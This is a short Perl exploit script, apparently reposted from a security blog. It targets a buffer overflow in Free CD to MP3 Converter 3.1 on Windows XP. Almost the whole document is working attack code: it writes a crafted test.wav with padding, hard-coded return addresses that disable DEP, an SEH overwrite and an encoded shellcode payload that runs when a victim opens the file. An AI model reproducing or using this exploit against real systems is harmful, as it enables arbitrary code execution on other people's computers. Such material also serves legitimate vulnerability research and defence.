Free CD to MP3 Converter 3.1 Buffer Overflow Exploit (Bypass DEP + SEH)
Source: http://riusksk.blogbus.com  Author: riusksk  Published: 2010-11-22

#!/usr/bin/perl
# Exploit Title: Free CD to MP3 Converter 3.1 Buffer Overflow Exploit (Bypass DEP + SEH)
# Original exploit by C4SS!0 G0M3S: http://www.exploit-db.com/exploits/15483/
# Modified by riusksk (http://riusksk.blogbus.com)
# Tested on Windows XP SP3 CN
# Date: 2010/11/20

my $junk1 = 'A'x 4112;

my $disabledep = "\x68\xdc\xec\x77";  # 0x77ecdc68 - push esp,pop ebp,ret 4,adjust ebp
$disabledep = $disabledep."\xea\x18\x97\x7c";  # 0x7c9718ea - set eax to 1 
$disabledep = $disabledep."\xff\xff\xff\xff"; # balance the stack
$disabledep = $disabledep."\x24\xcd\x93\x7c"; # 0x7c93cd24 - run NX Disable routine
$disabledep = $disabledep."\xff\xff\xff\xff"; # balance the stack

my $junk2 = 'B'x 24;    

my $nseh = "\x90\x90\xeb\x06";  # jmp 06
my $seh = "\x80\x14\x40\x00"; # pop pop ret, no safeseh
my $nops = "\x90\x90";    
my $shellcode =
"\xb8\xc7\xae\x8e\xae\xd9\xc7\x33\xc9\xb1\x31\xd9\x74\x24" .
"\xf4\x5b\x31\x43\x14\x83\xeb\xfc\x03\x43\x10\x25\x5b\x72" .
"\x46\x20\xa4\x8b\x97\x52\x2c\x6e\xa6\x40\x4a\xfa\x9b\x54" .
"\x18\xae\x17\x1f\x4c\x5b\xa3\x6d\x59\x6c\x04\xdb\xbf\x43" .
"\x95\xea\x7f\x0f\x55\x6d\xfc\x52\x8a\x4d\x3d\x9d\xdf\x8c" .
"\x7a\xc0\x10\xdc\xd3\x8e\x83\xf0\x50\xd2\x1f\xf1\xb6\x58" .
"\x1f\x89\xb3\x9f\xd4\x23\xbd\xcf\x45\x38\xf5\xf7\xee\x66" .
"\x26\x09\x22\x75\x1a\x40\x4f\x4d\xe8\x53\x99\x9c\x11\x62" .
"\xe5\x72\x2c\x4a\xe8\x8b\x68\x6d\x13\xfe\x82\x8d\xae\xf8" .
"\x50\xef\x74\x8d\x44\x57\xfe\x35\xad\x69\xd3\xa3\x26\x65" .
"\x98\xa0\x61\x6a\x1f\x65\x1a\x96\x94\x88\xcd\x1e\xee\xae" .
"\xc9\x7b\xb4\xcf\x48\x26\x1b\xf0\x8b\x8e\xc4\x54\xc7\x3d" .
"\x10\xee\x8a\x2b\xe7\x63\xb1\x15\xe7\x7b\xba\x35\x80\x4a" .
"\x31\xda\xd7\x53\x90\x9e\x26\xa5\x29\x0b\xbe\x1f\xd8\x76" .
"\xa2\xa0\x36\xb4\xdb\x22\xb3\x45\x18\x3a\xb6\x40\x64\xfd" .
"\x2a\x39\xf5\x6b\x4d\xee\xf6\xbe\x3e\x78\x09";

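open(my $fp, '>', 'test.wav') or die "Cannot open test.wav: $!";
binmode $fp;  # write raw bytes, no newline translation on Windows
print $fp $junk1.$disabledep.$junk2.$nseh.$seh.$nops.$shellcode;
close $fp;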


 